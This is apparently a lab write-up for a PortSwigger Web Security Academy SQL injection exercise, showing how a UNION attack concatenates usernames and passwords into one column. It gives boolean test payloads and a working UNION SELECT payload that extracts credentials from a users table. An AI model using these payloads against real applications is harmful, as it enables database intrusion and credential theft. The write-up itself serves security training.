# Lab: SQL injection UNION attack, retrieving multiple values in a single column

## Lab information

<https://portswigger.net/web-security/sql-injection/union-attacks/lab-determine-number-of-columns>

This lab contains a SQL injection vulnerability in the product category filter.

The vulnerability is similar to the ones in these labs:

* [Lab: SQL injection UNION attack, determining the number of columns returned by the query](/labs/portswigger-academy/sql-injection/lab-sql-injection-union-attack-determining-the-number-of-columns-returned-by-the-query.md)
* [Lab: SQL injection UNION attack, finding a column containing text](/labs/portswigger-academy/sql-injection/lab-sql-injection-union-attack-finding-a-column-containing-text.md)
* [Lab: SQL injection UNION attack, retrieving data from other tables](/labs/portswigger-academy/sql-injection/lab-sql-injection-union-attack-retrieving-data-from-other-tables.md)

## Exploitation flow

### Identifying the vulnerable parameter

To verify that the parameter is vulnerable, payloads using the logical AND operator are sent, for example: `'and'1337'='1337` and `'and'1337'='1338`.

It is identified the same way as in the lab: [Lab: SQL injection UNION attack, retrieving data from other tables](/labs/portswigger-academy/sql-injection/lab-sql-injection-union-attack-retrieving-data-from-other-tables.md)

### Retrieving usernames and passwords in a single column

```sql
'+UNION+SELECT+NULL,username||'~'||password+FROM+users--
```


As can be seen, the second column shows the values of both columns:

```
username~password
```
